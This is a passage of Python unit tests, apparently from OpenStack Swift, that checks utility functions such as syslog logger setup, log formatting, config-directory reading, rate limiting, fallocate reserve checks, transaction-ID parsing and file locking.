orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEquals(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEquals(strip_value(sio), '')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\n')
self.assertEquals(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\ntest\n')
self.assertEquals(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assert_('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('errno.ECONNREFUSED message test' not in log_msg)
self.assert_('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('ConnectionTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('MessageTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('txn' in log_msg)
self.assert_('12345' in log_msg)
# test no txn on info message
self.assertEquals(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('txn' not in log_msg)
self.assert_('12345' not in log_msg)
# test txn already in message
self.assertEquals(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEquals(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assert_('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('client_ip' in log_msg)
self.assert_('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('client_ip' not in log_msg)
self.assert_('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEquals(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_whataremyips(self):
myips = utils.whataremyips()
self.assert_(len(myips) > 1)
self.assert_('127.0.0.1' in myips)
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with nested(
patch('netifaces.interfaces', my_interfaces),
patch('netifaces.ifaddresses', my_ifaddress_error)):
self.assertEquals(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with nested(
patch('netifaces.interfaces', my_ipv6_interfaces),
patch('netifaces.ifaddresses', my_ipv6_ifaddresses)):
myips = utils.whataremyips()
self.assertEquals(len(myips), 1)
self.assertEquals(myips[0], test_ipv6_address)
def test_load_libc_function(self):
self.assert_(callable(
utils.load_libc_function('printf')))
self.assert_(callable(
utils.load_libc_function('some_not_real_function')))
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEquals(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEquals(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEquals(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEquals(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
import pwd
self.assertEquals(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds)
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, [])
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assert_(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
reset_loggers()
finally:
utils.sys = _orig_sys
utils.os = _orig_os
def test_get_logger_console(self):
reset_loggers()
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assert_(console_handlers)
# make sure you can't have two console handlers
self.assertEquals(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEquals(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEquals(new_handler, old_handler)
reset_loggers()
def test_ratelimit_sleep(self):
running_time = 0
start = time.time()
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.assertTrue(abs((time.time() - start) * 100) < 1)
running_time = 0
start = time.time()
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(25 - (time.time() - start) * 100) < 10)
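# Worked check of the timing asserted above (illustrative): at max_rate=200 calls
# are spaced 1/200 s apart, so 50 calls take roughly 50 / 200 = 0.25 s, i.e. 25
# hundredths of a second, which the assertion accepts within a 0.1 s tolerance.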
def test_ratelimit_sleep_with_incr(self):
running_time = 0
start = time.time()
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 250 (with no -1)
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertTrue(abs(50 - (time.time() - start) * 100) < 10)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEquals(parsed.scheme, 'http')
self.assertEquals(parsed.hostname, '127.0.0.1')
self.assertEquals(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEquals(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEquals(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEquals(parsed.hostname, '::1')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEquals(parsed.hostname, '')
def test_ratelimit_sleep_with_sleep(self):
running_time = 0
start = time.time()
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(100 - (time.time() - start) * 100) < 10)
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEquals(len(asdf), 1)
self.assertEquals(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEquals(len(app_bins), 2)
self.assertEquals(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEquals(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEquals(len(sub_ini), 1)
self.assertEquals(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt',
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEquals(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assert_(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEquals(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assert_(conf_dir in conf_dirs)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEquals(os.path.exists(file_name), False)
self.assertEquals(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assert_(os.path.exists(file_name))
self.assertEquals(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEquals(utils.human_readable(0), '0')
self.assertEquals(utils.human_readable(1), '1')
self.assertEquals(utils.human_readable(10), '10')
self.assertEquals(utils.human_readable(100), '100')
self.assertEquals(utils.human_readable(999), '999')
self.assertEquals(utils.human_readable(1024), '1Ki')
self.assertEquals(utils.human_readable(1535), '1Ki')
self.assertEquals(utils.human_readable(1536), '2Ki')
self.assertEquals(utils.human_readable(1047552), '1023Ki')
self.assertEquals(utils.human_readable(1048063), '1023Ki')
self.assertEquals(utils.human_readable(1048064), '1Mi')
self.assertEquals(utils.human_readable(1048576), '1Mi')
self.assertEquals(utils.human_readable(1073741824), '1Gi')
self.assertEquals(utils.human_readable(1099511627776), '1Ti')
self.assertEquals(utils.human_readable(1125899906842624), '1Pi')
self.assertEquals(utils.human_readable(1152921504606846976), '1Ei')
self.assertEquals(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEquals(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEquals(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
for goodurl in ('http://1.1.1.1/v1/a/c/o',
'http://1.1.1.1:8080/a/c/o',
'http://2.2.2.2/a/c/o',
'https://1.1.1.1/v1/a/c/o',
''):
self.assertEquals(utils.validate_sync_to(goodurl,
['1.1.1.1', '2.2.2.2']),
None)
for badurl in ('http://1.1.1.1',
'httpq://1.1.1.1/v1/a/c/o',
'http://1.1.1.1/v1/a/c/o?query',
'http://1.1.1.1/v1/a/c/o#frag',
'http://1.1.1.1/v1/a/c/o?query#frag',
'http://1.1.1.1/v1/a/c/o?query=param',
'http://1.1.1.1/v1/a/c/o?query=param#frag',
'http://1.1.1.2/v1/a/c/o'):
self.assertNotEquals(
utils.validate_sync_to(badurl, ['1.1.1.1', '2.2.2.2']),
None)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEquals(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEquals(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEquals(len(trans_id), 34)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEquals(len(trans_id), 41)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[34:], '-suffix')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEquals(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
